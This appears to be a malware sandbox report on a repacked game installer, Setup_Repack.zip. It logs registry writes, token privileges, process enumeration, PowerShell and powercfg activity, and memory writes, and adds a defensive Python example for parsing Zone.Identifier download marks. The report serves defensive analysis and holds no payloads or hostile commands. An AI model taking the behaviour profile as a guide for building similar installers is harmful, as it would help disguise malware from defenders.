Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mediafire.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "971" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "1343" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "40C" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A

NTFS ADS

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack.zip.t2sbfdg.partial:Zone.Identifier | C:\Windows\system32\browser_broker.exe | N/A
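The ADS row above is Edge's broker process writing the Mark of the Web (the Zone.Identifier stream) onto the in-progress download; the `.t2sbfdg.partial` suffix is the temporary name, and the finished file is Setup_Repack.zip. The later rows for 7zG.exe and C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe are consistent with that archive being extracted with 7-Zip and the contained Setup.exe run from the Desktop. For a responder, the stream matters because it records the zone and, in most browsers' implementations, the download and referrer URLs, which ties the archive back to its hosting site. The Python below is an added example, not part of this report: it parses a Zone.Identifier stream, maps ZoneId to the URLMON zone name, recovers the final file name from the partial-download name, and reads the stream off an NTFS file when run on Windows. The stream contents are constructed for the example; the sandbox did not record them, and the HostUrl domain is a placeholder, not the real download host.

```python
import configparser
import re
from urllib.parse import urlparse

# URLMON security zones as recorded in the ZoneId field.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Constructed sample of a Zone.Identifier stream as a browser writes it for a
# download. The report only shows that browser_broker.exe wrote this stream on
# Setup_Repack.zip.t2sbfdg.partial; the URLs below are placeholders, not values
# captured in the sandbox.
SAMPLE_STREAM = """[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://feel-easy.games/catalog/counter-strike-go/
HostUrl=https://download.example.invalid/Setup_Repack.zip
"""

# Legacy-Edge in-progress download name: <final name>.<random token>.partial
PARTIAL_RE = re.compile(r"^(?P<final>.+)\.[A-Za-z0-9]+\.partial$")


def final_name_from_partial(name: str) -> str:
    """Map an in-progress download name back to the completed file's name;
    names that are not .partial are returned unchanged."""
    m = PARTIAL_RE.match(name)
    return m.group("final") if m else name


def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style stream; raises ValueError if [ZoneTransfer] is absent."""
    cp = configparser.ConfigParser(interpolation=None)  # URLs may contain '%'
    cp.read_string(text)
    if not cp.has_section("ZoneTransfer"):
        raise ValueError("not a Zone.Identifier stream: missing [ZoneTransfer]")
    zone_raw = cp.get("ZoneTransfer", "ZoneId", fallback=None)
    zone_id = int(zone_raw) if zone_raw is not None else None
    host_url = cp.get("ZoneTransfer", "HostUrl", fallback=None)
    referrer = cp.get("ZoneTransfer", "ReferrerUrl", fallback=None)
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "unknown"),
        "host_url": host_url,
        "host_domain": urlparse(host_url).hostname if host_url else None,
        "referrer_url": referrer,
        "referrer_domain": urlparse(referrer).hostname if referrer else None,
    }


def is_internet_origin(record: dict) -> bool:
    """Zones 3 and 4 are what SmartScreen and Office Protected View act on."""
    return record["zone_id"] in (3, 4)


def read_zone_identifier(path: str):
    """Read and parse the stream from a file on NTFS (Windows). Returns None
    when the file carries no Mark of the Web or the stream cannot be read."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    print(final_name_from_partial("Setup_Repack.zip.t2sbfdg.partial"))
    print(parse_zone_identifier(SAMPLE_STREAM))
```

When you have the disk image, run read_zone_identifier against the completed Setup_Repack.zip rather than the .partial name, which is renamed when the download finishes. Note that the mark is attached to the archive, not to what comes out of it: whether the extracted Setup.exe carries a Zone.Identifier of its own depends on the extraction tool (7-Zip only propagates the stream if its Zone.Id propagation option is enabled), so its absence on the dropped executables is expected rather than evidence that the stream was stripped deliberately.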

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe | N/A
N/A | N/A | C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A
Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 1396 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
